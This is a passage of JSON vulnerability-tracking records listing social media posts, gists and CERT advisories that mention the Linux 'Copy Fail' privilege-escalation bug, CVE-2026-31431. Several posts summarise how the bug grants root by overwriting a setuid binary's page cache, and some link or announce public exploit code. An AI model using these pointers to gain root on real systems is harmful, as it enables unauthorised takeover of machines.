"", "creation_timestamp": "2026-04-30T15:40:35.427683Z"}, {"uuid": "9d8eac62-bfee-4b7d-9219-b62b255b452d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkowpljpqj2h", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T05:59:35.594045Z"}, {"uuid": "39e1e651-ec04-40de-b024-89ba388377cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hackernewsbot.bsky.social/post/3mknqqm2i4u2s", "content": "Copy Fail \u2013 CVE-2026-31431 | Discussion", "creation_timestamp": "2026-04-29T18:40:06.449720Z"}, {"uuid": "75ffc174-b880-4439-9034-ee0d28af8839", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/c3iq.bsky.social/post/3mkp2hagybs2p", "content": "CVE-2026-31431.  This is not a drill.  copy.fail", "creation_timestamp": "2026-04-30T07:06:29.675242Z"}, {"uuid": "d97ff212-7873-4628-809d-25b46c8fab7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/mschmitt/d2b0a19034e3247428d5c31091ba7bef", "content": "", "creation_timestamp": "2026-04-30T07:09:23.000000Z"}, {"uuid": "bc39a19f-d94c-40f3-810e-f46c1baa6f7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/dramforever/b86d29576f69b16b05af45745574a273", "content": "", "creation_timestamp": "2026-04-30T07:14:36.000000Z"}, {"uuid": "c8c02532-4dbf-45a4-9d43-3a87fc826c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/webcpu/7c928d4740d4b4330646df1041a5ee1e", "content": "", "creation_timestamp": "2026-04-30T08:15:26.000000Z"}, {"uuid": "eb55972a-0f30-4567-bc35-9cd257be46a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/GottZ/7cb012306afcb77f31b34fb62158d9c3", "content": "", "creation_timestamp": "2026-04-30T06:50:17.000000Z"}, {"uuid": "852158f4-51c4-42d6-a20e-d68664fcd634", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ncharles/3b258625474f123b8528a776941e8292", "content": "", "creation_timestamp": "2026-04-30T08:00:13.000000Z"}, {"uuid": "3bf8ba49-14ec-47f4-998c-039c09bc1fbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ottijp.com/post/3mkpby7yr3s2t", "content": "CVE-2026-31431", "creation_timestamp": "2026-04-30T09:21:14.846984Z"}, {"uuid": "ddcde28a-1df0-4d5b-8258-e94096dbcba4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/idrassi/8dca804c4ea4268719cb0e8f50638e11", "content": "", "creation_timestamp": "2026-04-30T08:26:25.000000Z"}, {"uuid": "576f0ea3-349b-4db7-8980-8fc22482c81f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/alon710/03871871846b38f098edf226a0f312a4", "content": "", "creation_timestamp": "2026-04-30T09:30:28.000000Z"}, {"uuid": "c4840d66-c3cd-493c-aece-05102d6f4cd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-nsm/alvorlig-sarbarhet-i-linux-kjernen", "content": "", "creation_timestamp": "2026-04-30T01:35:52.000000Z"}, {"uuid": "1808df77-623f-4ff0-8541-0a8914f8e3b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3mknrdcx42g2o", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/ (https://news.ycombinator.com/item?id=47952181)", "creation_timestamp": "2026-04-29T18:50:34.604672Z"}, {"uuid": "5a2386b5-d931-4010-be20-d6cc1a424e83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sagalinked.bsky.social/post/3mknrmu76am2g", "content": "\ud83d\udcf0 Oh no! Another copy fail! The tech world is abuzz with the latest security flaw - CVE-2026-31431. It's like a digital version of \"The Great Gatsby\" - everyone wants to know if it's going to be a disaster or just another chapter in the story. Stay tuned ...\n\n\ud83d\udd17 https://copy.fail/\n\n#Tech #Dev", "creation_timestamp": "2026-04-29T18:55:54.291664Z"}, {"uuid": "a7862b14-fa26-4ce2-b659-3c6541c8bc38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://thehackernews.com/2026/04/new-linux-copy-fail-vulnerability.html", "content": "", "creation_timestamp": "2026-04-30T07:24:00.000000Z"}, {"uuid": "4b835726-6fb5-4c99-a76a-756546058f7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kravietz.agora.echelon.pl.ap.brid.gy/post/3mknrnt5npao2", "content": "A nice new #Linux kernel exploit aka CopyFail CVE-2026-31431\n\nhttps://copy.fail/\n\n#infosec", "creation_timestamp": "2026-04-29T18:56:29.902610Z"}, {"uuid": "afcb455e-30a4-4b10-9f95-73d27acc2340", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://cert.europa.eu/publications/security-advisories/2026-005/", "content": "", "creation_timestamp": "2026-04-30T07:25:30.000000Z"}, {"uuid": "970d7846-a00c-49d9-99c5-0e4139a05fae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pavel.social.kernel.org.ap.brid.gy/post/3mkq2yq3symd2", "content": "CVE-2026-31431", "creation_timestamp": "2026-04-30T16:49:45.470865Z"}, {"uuid": "fff8b7b1-d16a-425f-9d4c-940084e826a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.cert.at/de/warnungen/2026/4/copy-fail-kritische-linux-kernel-schwachstelle-ermoglicht-lokale-root-rechte", "content": "", "creation_timestamp": "2026-04-30T07:12:27.000000Z"}, {"uuid": "4b50b26c-efe9-4284-b49e-28fbe19ed2cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/bram/9b48732e03d15257f31134caea8600f2", "content": "", "creation_timestamp": "2026-04-30T10:01:41.000000Z"}, {"uuid": "f9290da6-45c3-4c1c-bc1b-f378c5105d44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tildes.bsky.social/post/3mkpeu57l3q2w", "content": "Linux priveledge escalation (CVE-2026-31431) (@copy.fail)\n\nMain Link | Discussion", "creation_timestamp": "2026-04-30T10:12:39.572481Z"}, {"uuid": "3b2d6750-c3f2-43b5-a8e0-d3bd636dd29d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/reduanmasud/e4e2f5d0e7bc58d162ee306d58afe2c0", "content": "", "creation_timestamp": "2026-04-30T17:13:48.000000Z"}, {"uuid": "4ea1ba88-7e24-4c0e-8efa-9748a97f3996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hackernewstop5.bsky.social/post/3mkns2hhn432b", "content": "Copy Fail \u2013 CVE-2026-31431\n\n#HackerNews\n\nhttps://copy.fail/", "creation_timestamp": "2026-04-29T19:03:30.741416Z"}, {"uuid": "08e98e47-c5f7-4d7c-8fd2-ea291303ecf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/gormih/faa271309205184d220f2eeb6ac8fb4e", "content": "", "creation_timestamp": "2026-04-30T10:37:23.000000Z"}, {"uuid": "98a17e57-8a4e-4027-9432-5e063a6b3f51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/betterhn50.e-work.xyz/post/3mknsouqjld2g", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/ (https://news.ycombinator.com/item?id=47952181)", "creation_timestamp": "2026-04-29T19:14:55.776642Z"}, {"uuid": "e727d523-66fc-4e21-8b36-8c1cd2174625", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/agentwyre.ai/post/3mknsdz5qn22u", "content": "\ud83d\udd34 Copy Fail (CVE-2026-31431) gives unprivileged users a reliable Linux root path across mainstream distros\n\nCopy Fail, tracked as CVE-2026-31431, is a newly disclosed local privilege escalation bug in Linux that researchers say can reliably turn an unprivileged...\n\nhttps://copy.fail/\n\n#AI #AgentWyre", "creation_timestamp": "2026-04-29T19:08:50.870269Z"}, {"uuid": "3b49af04-0b18-4ee6-9646-4fb358f5df2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn100.atproto.rocks/post/3mknspk4xq72s", "content": "Copy Fail \u2013 CVE-2026-31431\nhttps://copy.fail/\n\nhttps://news.ycombinator.com/item?id=47952181", "creation_timestamp": "2026-04-29T19:15:17.974203Z"}, {"uuid": "7c6c2607-cc0a-46f8-b9ab-02a83048f8aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/giggls.bsky.geggus.net/post/3mknstexztiu2", "content": "Hm https://security-tracker.debian.org/tracker/CVE-2026-31431", "creation_timestamp": "2026-04-29T19:17:30.609877Z"}, {"uuid": "1117f125-651a-42a2-b85c-78c2b8fb7514", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/_8DZ7q8HXGubn2asS1SNYbdiSRV4J0KvfO1R9whXYUDjGA", "content": "", "creation_timestamp": "2026-04-30T18:41:24.000000Z"}, {"uuid": "93d427a1-5a80-42cf-b7d5-6a82d8cafdec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/XJFCu5UGSlf8LdrBjxjYOz5idEEI2EMesOUI85-NmJpK1tU", "content": "", "creation_timestamp": "2026-04-30T03:00:10.000000Z"}, {"uuid": "15d89919-b6c8-4072-ab16-ce558b3f38ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/fragmede/4fb38fb822359b8f5914127c2fe1c94f", "content": "", "creation_timestamp": "2026-04-29T20:24:46.000000Z"}, {"uuid": "4bc882f1-9bb7-433b-8841-e96ca732f841", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/g0xa52a2a.bsky.social/post/3mkntolp2u22w", "content": "CVE-2026-31431 is going to be one for the history books \ud83d\ude43\n\ncopy.fail", "creation_timestamp": "2026-04-29T19:32:42.539551Z"}, {"uuid": "caf9ecbf-6a7d-49e9-818f-c4888139a9d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newsycombinatorbot.bsky.social/post/3mkntx2xszb2r", "content": "Copy Fail \u2013 CVE-2026-31431 (copy.fail)\n\nDiscussion | Main Link", "creation_timestamp": "2026-04-29T19:37:23.650885Z"}, {"uuid": "c4093d42-ed7c-43a2-929c-3c1fbcf3eece", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn-frontpage-bot.bsky.social/post/3mknu3a45lo2n", "content": "A critical Linux vulnerability, \"Copy Fail\" (CVE-2026-31431), allows unprivileged local users to gain root access. Affecting all Linux distros since 2017, it's a 100% reliable logic flaw, not a race condition, and can lead to container escapes.", "creation_timestamp": "2026-04-29T19:39:43.956707Z"}, {"uuid": "f2508d8f-9fb3-46f1-a135-8b3212987bd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hackernewsrobot.bsky.social/post/3mknupcyraq2c", "content": "Copy Fail \u2013 CVE-2026-31431", "creation_timestamp": "2026-04-29T19:50:57.810485Z"}, {"uuid": "b872623f-f84d-4be1-8589-c6cb21bbbc20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newsyc200.bsky.social/post/3mknwjhmpnz2m", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/ (http://news.ycombinator.com/item?id=47952181)", "creation_timestamp": "2026-04-29T20:23:28.594842Z"}, {"uuid": "6a70f530-0cf8-4bf5-87e7-a4797e45ea83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosecbot.bsky.social/post/3mknthngxik26", "content": "Time to talk about this one.\n\nCopyFail (CVE-2026-31431) \u2014 a 732-byte Python script that roots every Linux distro shipped since 2017.\n\n\ud83d\udd01 RT @brian_pak | reposted by @hasherezade\nhttps://x.com/brian_pak/status/2049533584097362272", "creation_timestamp": "2026-04-29T19:28:46.262945Z"}, {"uuid": "dfeda009-4b03-4324-9324-de388a79700e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://mstdn.social/users/jschauma/statuses/116489699707306146", "content": "Ooooh, nice:\nhttps://xint.io/blog/copy-fail-linux-distributions\nCVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.\n#CopyFail", "creation_timestamp": "2026-04-29T19:42:37.387249Z"}, {"uuid": "709c1b74-7dc7-4c87-a280-905467cfbe22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/jschauma.mstdn.social.ap.brid.gy/post/3mknuakdijtq2", "content": "Ooooh, nice:\n\nhttps://xint.io/blog/copy-fail-linux-distributions\n\nCVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.\n\n#CopyFail", "creation_timestamp": "2026-04-29T19:42:45.645246Z"}, {"uuid": "34a22a4e-6b27-4b2b-9536-a4dfcebf0e48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/FLV6t7Va3c__w7z9N_mSu7nucQbg4vUfz1QpezNhFqmT_OM", "content": "", "creation_timestamp": "2026-05-02T21:00:04.000000Z"}, {"uuid": "f175f877-00d4-4670-b9fc-2e8f6c95423d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/jeht1hlPckgqiNrYmKXPjtYBl6Ckbf5A93GyXLRwxjRq970", "content": "", "creation_timestamp": "2026-05-03T09:00:04.000000Z"}, {"uuid": "558edd6d-5e33-4142-a144-da4398164d8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newsyc250.bsky.social/post/3mknyr5hmok2a", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/ (http://news.ycombinator.com/item?id=47952181)", "creation_timestamp": "2026-04-29T21:03:33.751818Z"}, {"uuid": "25238001-d1d6-4f6a-ab2b-29dd1a7918a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/MurpDVre-4LCYzH5BvUtvVRvpJ9yqT35RKsHtthqDCH1oSA", "content": "", "creation_timestamp": "2026-05-03T03:00:05.000000Z"}, {"uuid": "1320ed87-aaba-4415-ac0e-b3f7bb2f3fa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/lalgorisme.bsky.social/post/3mknxngmmqk2z", "content": "La IA ha ajudat a descobrir una nova vulnerabilitat cr\u00edtica a Linux: CVE-2026-31431 \u201cCopy Fail\u201d\nUn \u00fanic script Python de 732 l\u00ednies permet a qualsevol usuari local obtenir acc\u00e9s root en pr\u00e0cticament tots els sistemes Linux des de 2017.\n\ncopy.fail", "creation_timestamp": "2026-04-29T20:43:39.336097Z"}, {"uuid": "63c10239-afc1-4910-87c4-0826a30042b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mknxobha532x", "content": "CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-29T20:44:06.150772Z"}, {"uuid": "be0d0c87-ae23-44cb-baef-459249ef8970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/linux-kernel-elevation-of-privilege-vulnerability_20260504", "content": "", "creation_timestamp": "2026-05-03T18:45:00.000000Z"}, {"uuid": "b979ab0d-268b-4c1f-bdfe-1b437f4c509a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/P0x3k_1N73LL1G3NC3/339", "content": "Copy Fail\u2014 Linux LPE (CVE-2026-31431)\n\nA logic bug in the Linux kernel's authencesncryptographic template. It lets an unprivileged local user trigger a deterministic, controlled 4-byte write into the page cache of any readable file on the system. A single 732-byte Python script can edit a setuid binary and obtain root on essentially all Linux distributions shipped since 2017.\n\nExploit: https://github.com/theori-io/copy-fail-CVE-2026-31431\n\nA 732-byte PoC gets root on Ubuntu, Amazon Linux, RHEL, SUSE.", "creation_timestamp": "2026-04-29T19:58:35.000000Z"}, {"uuid": "925b5176-fe0d-47db-8036-35b48b4cbb75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/m1ddl3w4r3/cdf95ac103d819eab7100f6b3d7c7f2f", "content": "", "creation_timestamp": "2026-04-29T21:01:14.000000Z"}, {"uuid": "6496ada0-1f11-4e01-aa84-20ed8fb71f23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/cYbomHaTGTLOs95SVGZEas4XOSbbs1P0dkn6F8I8p6igQwc", "content": "", "creation_timestamp": "2026-05-02T15:00:06.000000Z"}, {"uuid": "802becb1-9d54-45d3-9e9e-a224266c3eec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/3a2jD3gjNHncLnKc8fyr9DC3SGOgXMvvZ9Cx1ndl6893LxY", "content": "", "creation_timestamp": "2026-05-02T09:00:04.000000Z"}, {"uuid": "94932710-1e7e-40a5-ba6b-b3ee9d40f7fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/fussycoder.bsky.social/post/3mkny2aetks2g", "content": "Welp, CVE-2026-31431  is exciting... \ud83d\udc40\ud83d\ude31", "creation_timestamp": "2026-04-29T20:50:44.587316Z"}, {"uuid": "65ac8204-7f5a-4ce8-9f5d-4967a1029e87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml2d44phkd2e", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-04T18:40:36.395086Z"}, {"uuid": "a2ab5bc1-07b9-45ed-bc61-de8ea19e2add", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mkzyhwb6zh27", "content": "\ud83d\udd17 CVE : CVE-2026-31431, CVE-2026-341431", "creation_timestamp": "2026-05-04T15:30:21.683811Z"}, {"uuid": "83b07711-6482-47aa-8c7c-7b07b2650a12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/valere.hostux.social.ap.brid.gy/post/3mkrginetjbl2", "content": "https://security-tracker.debian.org/tracker/CVE-2026-31431\n\nPatched kernel for Debian 13 Trixie\n\n#CopyFAil", "creation_timestamp": "2026-05-01T05:47:25.411150Z"}, {"uuid": "396e0df9-407f-438f-9320-9df1c2c75239", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mknyu5g6kzo2", "content": "Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. ht...\n\n#r/sysadmin\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-29T21:05:18.702703Z"}, {"uuid": "381f58ba-cccf-4e52-8ea9-020e6dfddff1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/P0x3k_1N73LL1G3NC3/342", "content": "CopyFail-go\n\nCopyFail (CVE-2026-31431) in Go. In case you want to get root from a static binary without Python as a dependency.", "creation_timestamp": "2026-04-30T18:38:25.000000Z"}, {"uuid": "0fe4ee51-5305-4026-bf5e-a3ed46a3f361", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml2au4kdt52u", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T18:00:20.516442Z"}, {"uuid": "d581d4e3-958e-4297-b219-55d7b443b8a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/tgies/e6db71355e3a930dd72c4e0f25f4dd26", "content": "", "creation_timestamp": "2026-04-29T21:13:56.000000Z"}, {"uuid": "0ec1511f-59a0-474d-b1ed-68632be8706f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/what.tf/post/3mko32tio7c2m", "content": "\ud83d\udea8 CVE-2026-31431 (Copy Fail)\nGo patch all your Linux distros ASAP.\n\nTL; DR: Easy and portable Linux privilege escalation, a local user is able to become root with very little prerequisites. All major distros affected.\n\ncopy.fail\nxint.io/blog/copy-fa...\nsecurity-tracker.debian.org/tracker/CVE-...", "creation_timestamp": "2026-04-29T21:44:49.008005Z"}, {"uuid": "7fe92ba3-8f07-4a4b-a72f-d70d35773196", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3mkovsybku62y", "content": "Linux Kernel \u201cCopy Fail\u201d Zero-Day Exposes Millions of Systems to Instant Root\u00a0Access\n\nIntroduction A newly disclosed Linux kernel vulnerability is raising serious alarms across the cybersecurity world. Tracked as CVE-2026-31431 and nicknamed Copy Fail, the flaw allows any unprivileged local user to\u2026", "creation_timestamp": "2026-04-30T05:43:34.505561Z"}, {"uuid": "f23cfa1d-3744-473a-a897-4824c02e33bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": 